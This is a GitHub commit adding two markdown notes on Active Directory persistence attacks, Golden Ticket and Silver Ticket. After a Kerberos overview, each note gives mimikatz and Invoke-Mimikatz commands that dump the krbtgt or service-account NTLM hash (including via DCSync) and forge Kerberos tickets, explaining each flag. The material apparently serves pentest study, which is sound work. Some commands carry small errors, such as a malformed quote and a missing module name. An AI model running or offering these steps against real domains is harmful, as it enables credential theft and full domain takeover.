Add files via upload

This commit is contained in:
ARZ 2021-12-07 17:40:36 +05:00 committed by GitHub
parent 5f2af1ff20
commit 6844389cc2
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
2 changed files with 138 additions and 0 deletions

View file

@ -0,0 +1,91 @@
# Domain Persistance - Golden Ticket
Kerbros is basis of authentication in AD , it is being attacked since it was implemented with new attacks being discovered every year
## Steps in Kerberos
- User logs on with username & password.
- Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request Authenitcation Service Request (AS-REQ). The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).
- **The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.**
- The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.
- The TGS is encrypted using the target service accountss NTLM password hash and sent to the user (TGS-REP)
- The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash.
- Optional mutual authentication is done by service that the user provides TGS ticket to
## Golden Ticket
The TGT (Ticket Granting Ticket) that we obtain in the kerberos in the step where we request a TGS (Ticket Granting Service ) for a service that we want to connect ,it's a signed and encrypted by hash of `krbtgt` account
Using golden tickets we can forge or create our own tickets to access other services (create TGT for services to request TGS for any service on any computer in domain)
To create a golden ticket we need 2 things , `krbtgt` account's password never changes and the account name is same in every domain and it's responsible for reading and signing TGT
- KRBTGT account password hash
- Domain name and SID
## Using AD module
```
Import-Module activedirectory
Get-ADUser krbtgt
```
## Using mimikatz.exe
```
privilege::debug
lsadump:lsa /inject /name:krbtgt
```
After getting the `NTLM hash which used RC4 encryption` and SID of krbtgt we can create a golden ticket for any user , can be an existing or a fake one , all is required is the
- `/user` name (Arz) ,
- `/id` 500 which is deafult ID for Administrator user or any other id
- `/groups` we can leave it blank as the default group would be `Domain Admins`
- `/sid` insert SID of krbtgt user that we extracted earlier
- `/ptt` load the ticket in current powershell session
- `/ticket` save the ticket on disk
-`/startoffset:0` start the time of ticket , 0 means that ticket is created right now , -1 which would mean that it has been created in the past
- `/endin:600` ticket liftime by default is 10 years , 600 means 600 minutes which is 10 hours
- `/renewmax:10080` ticket renewal , by defualt is 10 years , 10080 minutes is 7 days
The last 3 arguments are optional
```
kerberos:golden /domain: domain_name /sid:sid_of_krbtgt /rc4:krbtgt_hash /user:arz /id: 500 /ptt | /ticket
```
## Mimikatz Powershell
### Execute Mimikatz on DC as Domain Administrator to get krbtgt hash
```
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername computername
```
This will list all user's NTLM hashes
### When we have found krbtgt hash we can forge a TGT
```
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:domainname /sid:sid_of_krbtgt /krbtgt:ntlm_hash_of_krbtgt" id:500 /groups /ptt"'
```
### DCSync feature for getting krbtgt hash
If a user has DCSync rights (permission to replicated DC changes ) let's say `arz` can replicate DC changes
```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:arz"'
```
Or
```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'
```

View file

@ -0,0 +1,47 @@
# Domain Persistance - Silver Ticket
Kerbros is basis of authentication in AD , it is being attacked since it was implemented with new attacks being discovered every year
## Steps in Kerberos
- User logs on with username & password.
- Password converted to NTLM hash, a timestamp is encrypted with the hash and sent to the KDC (Key Distribution Centre also known as Domain Controller) as an authenticator in the authentication ticket (TGT) request Authenitcation Service Request (AS-REQ). The Domain Controller (KDC) checks user information (logon restrictions, group membership, etc) & creates Ticket-Granting Ticket (TGT).
- The TGT is encrypted, signed, & delivered to the user (AS-REP). Only the Kerberos service (KRBTGT) in the domain can open and read TGT data.
- The User presents the TGT to the DC when requesting a Ticket Granting Service (TGS) ticket (TGS-REQ). The DC opens the TGT & validates PAC checksum . If the DC can open the ticket & the checksum check out, `TGT = valid`. The data in the TGT is effectively copied to create the TGS ticket.
- The TGS is encrypted using the target service accountss NTLM password hash and sent to the user (TGS-REP).
- **The user connects to the server hosting the service on the appropriate port & presents the TGS Application Request (AP-REQ). The service opens the TGS ticket using its NTLM password hash.**
- Optional mutual authentication is done by service that the user provides TGS ticket to
## Silver Ticket
The ticket that we obtain after getting TGT (Ticket Granting Ticket) signed by krbtgt from KDC , we recieve a TGS (Ticket Granting Service) for the server that we requested , that ticket is `silver ticket` , it is encrypted and signed by NTLM hash of service account of the service that is running
## Using mimikatz.exe
After getting the `NTLM hash which used RC4 encryption` of service account for which we want the TGS and SID of domain which can be found using`whoami /user` we can create a silver ticket , all that is required is
- `/sid` insert SID of domain
- `/domain` domain name
- `/target` hostname of the service
- `/user` can be any username , even the one which does not exists
- `/id` can be any id
- `/service` name of the service
- `/rc4` NTLM hash of service account
- `/ptt` pass the ticket , load the ticket into the powershell session
```
privilege::debug
kerberos::golden /sid:sid_of_domain /domain:name_of_domain /ptt /id:500 /target:hostname_of_service_server /service:name_of_service /rc4:NTLM_of_service_account /user:any_user_name
```
```
Invoke-Mimikatz -Command '"/sid:sid_of_domain /domain:name_of_domain /ptt /id:500 /target:hostname_of_service_server /service:name_of_service /rc4:NTLM_of_service_account /user:any_user_name"'
```